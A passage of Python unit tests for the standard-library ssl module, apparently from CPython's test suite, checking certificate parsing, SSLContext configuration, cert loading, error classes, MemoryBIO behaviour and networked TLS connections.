self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
ctx.options)
ctx.options |= ssl.OP_NO_SSLv3
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value by OpenSSL
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
